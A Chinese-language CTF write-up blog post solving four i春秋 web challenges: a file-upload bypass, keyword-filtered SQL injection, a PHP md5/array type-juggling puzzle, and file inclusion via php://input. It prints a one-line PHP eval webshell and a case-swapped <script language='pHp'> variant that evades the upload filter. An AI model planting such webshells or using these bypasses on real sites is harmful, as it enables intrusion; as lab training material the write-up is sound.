i春秋做题记录 web(一)
前言:
时间过的真快呀,一转眼半学期就过去了( ̄m ̄);攻防世界上的题差不多刷完了(剩下的都是不会的T_T),这周就来做做 i春秋的题,顺便记录下。
1、想怎么传就怎么传,就是这么任性。
题型: Web Upload
这题就是一个简单的文件上传题目;先用一个普通的php小马试一下:<?php @eval($_POST['smk']);?>
然后发现文件是上传成功了,但是<? php
被过滤掉了
于是在网上找到另一个一句话,将php用大写绕过 修改后如下:
<script language="pHp">@eval($_POST['smk'])</script>
然后连接菜刀就能看到flag了。
2、出题人就告诉你这是个注入,有种别走!
题型: Web Sql
打开题目:
看到题目的url就知道要对id注入。首先试一下order by,发现错误,可能是关键字过滤。试了试/**/
还是不行,改用<>
发现可以了,如图:
测试得字段数为3,接下来就没啥好说的了,按顺序,爆库爆表爆字段
得到flag。
3、这个真的是爆破。
题型:Misc Web
打开题目,看到一段php语句:
error_reporting(0);// 关闭错误报告
session_start();//启动会话
require('./flag.php');
if(!isset($_SESSION['nums'])){//isset() — 检测变量是否设置。$_SESSION['nums'] = 0;$_SESSION['time'] = time();//返回当前时间的 Unix 时间戳$_SESSION['whoami'] = 'ea';
}if($_SESSION['time']+120<time()){session_destroy();//session_destroy — 销毁一个会话中的全部数据
}//120s后会话结束$value = $_REQUEST['value'];
$str_rand = range('a', 'z');//range创建一个包含从 "a" 到 "z" 之间的元素范围的数组
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];//mt_rand() 使用 Mersenne Twister 算法返回0到25之间的随机整数。$str_rand[mt_rand(0,25)]返回"a" 到 "z"之间任意字母。$str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)]是两任意字母相连if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){//substr(string,start,length)。===是包括变量值与类型完全相等。==只是比较两个数的值是否相等,由于substr是字符串,和数字比较的时候会强制转化成数字0,自然和0相等。$_SESSION['nums']++;$_SESSION['whoami'] = $str_rands;echo $str_rands;
}if($_SESSION['nums']>=10){//循环10次输出flag,暴力破解echo $flag;
}show_source(__FILE__);
?>
因为md5不能对数组进行处理,MD5()计算数组会返回null,里面的判断是用==所以我们用数组传值那么substr(md5($value),5,4)==0
这个条件恒成立。
因为我刚访问由于这段代码$_SESSION['whoami'] = 'ea';
我们要先传入?value[]=ea
那么nums就会自增,$_SEESION['whoami'] = 随机2个字母
并同时输出到页面上,我们再根据输出的字符修改$value[0].$value[1]
的值即可,只要操作大于等于10次,就可以出flag 。
综上所述循环10次后输出flag:
4、没错!就是文件包含漏洞
题型:Web Upload
知识点:
1、当php开启allow_url_include的时候,可以用php://input伪协议包含文件
2、php中的system命令执行函数
这题也挺简单,利用了php伪协议 :
- php://input
构造场景:本地web服务器根目录下有文件phpinput_server.php
,代码如下:
<?php$a = $_GET['a'];$raw_post_data = file_get_contents($a,'r');//'php://input'echo $raw_post_data;
?>
在浏览器中按照如下方式访问:
地址栏输入的是:http://localhost/phpinput_server.php?a=php://input
post框直接输入一段数据
Excute后,脚本会在页面中输出这段数据。
总结:此种方式可以用来获取post数据,但不能获取get数据。
既然题目是文件包含,我们来看下关键性函数的状态
allow_url_include
当allow_url_include
为On而allow_url_fopen
为Off的时候,我们可以用用php://input伪协议进行包含
可以看到目录下有三个文件,flag是在第一个文件里
查看dle345aae.php:
右键查看源码:得到flag
i春秋做题记录 web(一)相关推荐
- 【Pikachu】漏洞练习平台做题记录+原理解析(2.2)XSS姿势和技巧
前言 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意. pikach ...
- CTF-web做题记录(狼组/BUUCTF)【一】
CTF-web做题记录(狼组/BUUCTF)[一] WEB 1.ctf.wgpsec 你可能需要一部iphone 题目如下 考察点:user-agent,burp改为iphone的user-agent ...
- 概率期望题(期望 DP)做题记录
概率期望题(期望 DP)做题记录 P3830 [SHOI2012]随机树 难点在于第二问:生成树的期望深度. 不 wei zhuo 捏,设 \(dp_{i,j}\) 表示已经有了 \(i\) 个叶子结 ...
- 数数题(计数类 DP)做题记录
数数题(计数类 DP)做题记录 CF1657E Star MST 我们称张无向完全图是美丽的当且仅当:所有和 \(1\) 相连的边的边权之和等于这张完全图的最小生成树的边权之和. 完全图点数为 \(n ...
- CSDN 第六期编程竞赛做题记录
CSDN 第六期编程竞赛做题记录 -- CSDN编程竞赛报名地址:https://edu.csdn.net/contest/detail/16 9.18周日闲来无视写一下 csdn 的编程题,每期编程 ...
- 退役前的做题记录5.0
退役前的做题记录5.0 出于某种原因新开了一篇. [CodeChef]Querying on a Grid 对序列建立分治结构,每次处理\((l,mid,r)\)时,以\(mid\)为源点建立最短路树 ...
- Regional 做题记录 (50/50)
写在前面 博主深感自己太弱了QAQ 于是有了一个刷水的想法,Regional的题目还是有很多考查思维的题目,所以这次是乱做50道思考题,可能会顺带做一些水题,这些题的简要题解会写到这篇博文里面,希望能 ...
- 2020.7月做题记录
转眼就到了2020的下半年了-前方仍是一片茫然. 长期计划 prufer 序列 2020.07.02-2020.07.04 Problem Finished P2624 [HNOI2008]明明的烦恼 ...
- 退役前的做题记录1.0
退役前的做题记录1.0 租酥雨最近很懒qwq,具体表现在写题的时候不想发题解了. 但是想想这样也不太好,就决定发个一句话(半句话到几句话不等)题解上来. 2018-09.18-2018-09.28 [ ...
最新文章
- git clone一个github上的仓库非常缓慢 和 github网页打不开
- MYSQL中TIMESTAMP类型的默认值
- GridView中FooterTemplate模板下内容不显示
- C语言指针操作字符数组demo
- C++_引用_引用的基本语法_注意事项_引用做函数参数---C++语言工作笔记031
- mysql 使用注意
- Linux下conda镜像源配置
- [Git] Squash all of my commits into a single one and merge into master
- PDF格式的文件该如何转换成PPT
- 保持简单----纪念丹尼斯•里奇(Dennis Ritchie)
- 怎样让私服服务器彻底崩溃
- [poi-tl]转换html内容到word
- 30天自制操作系统Day2
- 简单密码验证:重复的数字字母或连续的数字字母
- 三维地理信息系统应用的关注要点
- 手机端获取用户详细地理位置(高德地图API)
- AI拟声: 5秒内克隆您的声音并生成任意语音内容
- 解决缺少API-MS-WIN-CORE-SYNCH-L1-1-0.DLL等一系列DLL的问题
- Python中调用Linux命令之os.system、os.popen
- 古诗文欣赏-春夜宴桃李园序
热门文章
- airflow sql_alchemy_conn mysql_搭建AirFlow—— 一段波折后的总结
- Android 使用ContentProvider(内容提供者)查询手机联系
- 通过豆瓣电影的多方法解析,带你学会爬虫的所有解析方法
- ICCV 2021 | G-SFDA:无需源数据的领域自适应方法
- 本周六锁定成都!解析百度文心(ERNIE)如何助力快速定制企业级NLP模型
- 将“softmax+交叉熵”推广到多标签分类问题
- “让Keras更酷一些!”:层中层与mask
- 自适应注意力机制在Image Caption中的应用
- Mixup vs. SamplePairing:ICLR2018投稿论文的两种数据增广方式
- 【Linux病毒】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)